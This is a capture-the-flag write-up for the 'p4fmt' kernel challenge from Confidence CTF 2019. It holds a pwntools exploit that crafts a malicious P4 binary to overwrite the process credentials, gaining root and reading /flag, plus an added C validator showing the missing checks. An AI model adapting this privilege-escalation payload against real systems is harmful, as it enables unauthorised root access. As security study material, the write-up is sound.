Rating: 4.0
Full writeup at [https://devcraft.io/2019/03/19/p4fmt-confidence-ctf-2019-teaser.html](https://devcraft.io/2019/03/19/p4fmt-confidence-ctf-2019-teaser.html)
The P4 format is something like:
```c
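enum p4_type {
    SIMPLE = 0,
    ADVANCED = 1
};

/* One entry of the mapping table. */
struct p4_mapping {
    long load_addr;   /* the exploit below ORs flag bits (7, 8) into this field */
    long length;
    long offset;
};

/* File header. */
struct p4_bin {
    char magic[2];        /* "P4" */
    char version;
    enum p4_type type;    /* packed as a single byte (p8) in the exploit below */
    int mapping_count;
    long offset;
};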
```
Exploit:

* Leak the creds address using a mapping count of 6.
* Create a mapping to overwrite the cred ids with 0 using `__clear_user`.

```python
from pwn import *
context.arch = "amd64"
context.os = "linux"
code = asm(shellcraft.cat("/flag") + shellcraft.exit())
creds = 0xffff93a1875f80c0 # leaked creds struct
payload = ""
payload += "P4" # magic
payload += p8(0) # version
payload += p8(1) # type
payload += p32(3) # count
payload += p64(0x10) # offset
payload += p64(0x400058) # entry
payload += p64(0)
payload += p64(0)
payload += p64(0x400000 | 7) # prot
payload += p64(0x1000)
payload += p64(0)
payload += p64((creds + 0x10) | 8) # clear
payload += p64(0x20)
payload += p64(0)
payload += code
print "rm b; printf '" + payload.encode("string_escape") + "'>b;chmod +x ./b; ./b"
```
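
Both steps rely on header fields being used without validation: a mapping count larger than the table that was read, and a mapping whose address lies in kernel space. The following is an added example, not code from the writeup or the challenge, showing the two checks in user-space C. The 16-byte header layout is assumed from how the payload above is packed, and `p4_validate`, the error names, the flag mask and the address limit are hypothetical.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Assumed on-disk layout, taken from how the payload above is packed:
 * magic[2], version (1), type (1), mapping_count (4), offset (8) = 16 bytes,
 * then mapping_count entries of three 64-bit little-endian fields. */
#define P4_HDR_SIZE  16u
#define P4_MAP_SIZE  24u
#define P4_FLAG_MASK 0xfffULL              /* assumption: flags sit below page size */
#define USER_VA_END  0x00007ffffffff000ULL /* x86-64 user limit, 4-level paging */

enum p4_err { P4_OK = 0, P4_BAD_HEADER, P4_TABLE_OOB, P4_KERNEL_ADDR };

/* Field readers; a little-endian host is assumed. */
static uint64_t rd64(const unsigned char *p) { uint64_t v; memcpy(&v, p, 8); return v; }
static uint32_t rd32(const unsigned char *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* Hypothetical validator: P4_OK only if the table and every mapping are sane. */
enum p4_err p4_validate(const unsigned char *buf, size_t len)
{
    if (len < P4_HDR_SIZE || memcmp(buf, "P4", 2) != 0)
        return P4_BAD_HEADER;

    uint32_t count = rd32(buf + 4);
    uint64_t off   = rd64(buf + 8);

    /* The mapping table must lie entirely inside the bytes actually read,
     * otherwise entries are parsed from whatever follows the buffer. */
    if (off > len || count > (len - off) / P4_MAP_SIZE)
        return P4_TABLE_OOB;

    for (uint32_t i = 0; i < count; i++) {
        const unsigned char *m = buf + off + (size_t)i * P4_MAP_SIZE;
        uint64_t addr = rd64(m) & ~P4_FLAG_MASK;
        uint64_t size = rd64(m + 8);
        /* The range must stay in user space; written so addr + size cannot wrap. */
        if (addr >= USER_VA_END || size > USER_VA_END - addr)
            return P4_KERNEL_ADDR;
    }
    return P4_OK;
}
```
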